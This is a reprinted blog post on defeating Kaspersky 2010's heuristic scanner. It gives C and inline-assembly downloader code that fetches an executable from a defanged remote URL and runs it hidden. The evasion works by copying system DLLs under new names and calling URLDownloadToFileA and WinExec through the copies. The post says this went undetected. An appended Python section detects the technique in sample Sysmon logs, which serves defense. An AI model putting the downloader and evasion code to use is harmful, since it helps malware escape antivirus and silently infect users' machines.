Analysis of Kaspersky heuristic scanning and its bypass scheme

Source: Internet
Author: User

Reprinted from:

Kaspersky 2010 has a powerful heuristic scanner. In reality, though, heuristic scanning has many weaknesses: it does not fully emulate the environment the program runs in, and that may leave room to bypass the heuristic scan. Other anti-virus products' heuristic scanners have the same gaps. Let's analyze Kaspersky's heuristic scan below.
First, to run the test we need a program that targets the heuristic scanner specifically, otherwise there is no effect. Which code should we pick for the test? There is one kind of code that almost every heuristic scanner flags: downloader code. Typical download code looks like this:

(To prevent accidental clicks, all URLs are written as HXXP; change them back before visiting.)

    int _tmain(int argc, _TCHAR* argv[])
    {
        // the download URL was lost in extraction; the page does not preserve it
        URLDownloadToFileA(NULL, /* download URL */, "c:\\yan.exe", 0, NULL);
        WinExec("c:\\yan.exe", SW_HIDE);
    }

The code above should be the most familiar: the heuristic scanner sees the calls to URLDownloadToFileA and WinExec and treats the program as a virus. First, compile the program and submit it to Kaspersky 2010.
Kaspersky reports it as a downloader virus, so its heuristic scanner has done its job. In testing, whether the calls were switched to dynamic calls or moved into other programs, as long as WinExec in Kernel32.dll and URLDownloadToFileA in UrlMon.dll are called, the program cannot escape Kaspersky's heuristic scan.
Now we start from the weakness of heuristic scanning mentioned above: the emulated environment is incomplete. When the program creates files or performs similar operations, nothing actually happens inside the heuristic scanner's emulation. That is where this method comes from: copy Kernel32.dll to Kaba.dll, then dynamically call the WinExec function from KaBa.dll. The heuristic scan should then be defeated, because inside its emulation the Kaba.dll file was never really copied, so our dynamic call is unknown to it and the program is considered safe. Modify the code as follows:

    char* str = "C:\\yan.exe";
    char* url = "Hxxp://www.hehe/yan.exe";
    CopyFileA("C:\\windows\\system32\\urlmon.dll", "C:\\windows\\system32\\kabaurl.dll", TRUE);
    LoadLibrary("KaBaUrl.dll");
    PVOID Dwon = GetProcAddress(GetModuleHandle("KaBaUrl.dll"), "URLDownloadToFileA");
    _asm {
        push 0        // lpfnCB
        push 0        // dwReserved
        push str      // szFileName
        push url      // szURL
        push 0        // pCaller
        call Dwon
    }
    CopyFileA("C:\\windows\\system32\\kernel32.dll", "C:\\windows\\system32\\kaba.dll", TRUE);
    LoadLibrary("KaBa.dll");
    PVOID Fun = GetProcAddress(GetModuleHandle("KaBa.dll"), "WinExec");
    _asm {
        push SW_HIDE  // uCmdShow
        push str      // lpCmdLine
        call Fun
    }

When the program built from the code above is run, Kaspersky shows no reaction at all, so heuristic scanning clearly has a major disadvantage here. Finally, I hope Kaspersky's heuristic scanning keeps improving; once anti-virus heuristic scanners can fully emulate the environment a program runs in, perhaps they will no longer be called heuristic scanning at all. (Declaration: the code above is for testing purposes only; anyone who uses it illegally bears the consequences themselves.)
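From the defender's side, the copy-and-rename step in the code above is itself the observable: the copied file keeps its version resource, so its OriginalFileName (urlmon.dll, kernel32.dll) no longer matches the name it is loaded under (kabaurl.dll, kaba.dll), and the same process that wrote the file into System32 is the one that loads it. The following check is an added example, not part of the original post: it runs both comparisons over constructed Sysmon-style records (event ID 7 ImageLoad carries ImageLoaded and OriginalFileName, event ID 11 FileCreate carries TargetFilename); the field names follow Sysmon, the log lines, process names and paths are constructed.

```python
import ntpath
import re

# Constructed Sysmon-style records (ImageLoad = event 7, FileCreate = event 11) in
# key=value form; the lines are made up for this example, only the field names are Sysmon's.
SAMPLE_LOG = r"""EventID=7 ProcessId=1337 Image=C:\test\yan_loader.exe ImageLoaded=C:\Windows\System32\kernel32.dll OriginalFileName=kernel32.dll
EventID=7 ProcessId=1337 Image=C:\test\yan_loader.exe ImageLoaded=C:\Windows\System32\kabaurl.dll OriginalFileName=urlmon.dll
EventID=7 ProcessId=1337 Image=C:\test\yan_loader.exe ImageLoaded=C:\Windows\System32\kaba.dll OriginalFileName=kernel32.dll
EventID=7 ProcessId=2048 Image=C:\Windows\explorer.exe ImageLoaded=C:\Windows\System32\urlmon.dll OriginalFileName=urlmon.dll
EventID=7 ProcessId=2048 Image=C:\Windows\explorer.exe ImageLoaded=C:\Program Files\App\plugin.dll OriginalFileName=-
EventID=11 ProcessId=1337 Image=C:\test\yan_loader.exe TargetFilename=C:\Windows\System32\kaba.dll
"""

# A value runs until the next " key=" token, so paths containing spaces survive.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

def parse_record(line):
    """Turn one key=value log line into a dict."""
    return dict(FIELD_RE.findall(line))

def name_stem(filename):
    # Some Microsoft DLLs record OriginalFilename without an extension, so compare stems.
    return ntpath.splitext(ntpath.basename(filename))[0].lower()

def suspicious_loads(log_text):
    """(pid, image, loaded_path, original_name) for each ImageLoad whose on-disk name differs
    from the version resource's OriginalFileName; loads with no resource ("-") are skipped."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec.get("EventID") != "7":
            continue
        original = rec.get("OriginalFileName", "-")
        if original in ("-", "") or name_stem(original) == name_stem(rec["ImageLoaded"]):
            continue
        hits.append((rec["ProcessId"], rec["Image"], rec["ImageLoaded"], original))
    return hits

def creator_also_loaded(log_text):
    """Stronger signal: the same process both wrote a file (event 11) and loaded it (event 7).
    Returns the set of (pid, lower-cased path) pairs; event order is not checked here."""
    created, loaded = set(), set()
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec.get("EventID") == "11":
            created.add((rec["ProcessId"], rec["TargetFilename"].lower()))
        elif rec.get("EventID") == "7":
            loaded.add((rec["ProcessId"], rec["ImageLoaded"].lower()))
    return created & loaded
```

The name/resource mismatch on its own produces some legitimate hits (software that ships renamed DLLs), so in practice it is a lead to be allowlisted, while the created-then-loaded pair from a non-installer process is the higher-confidence signal.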
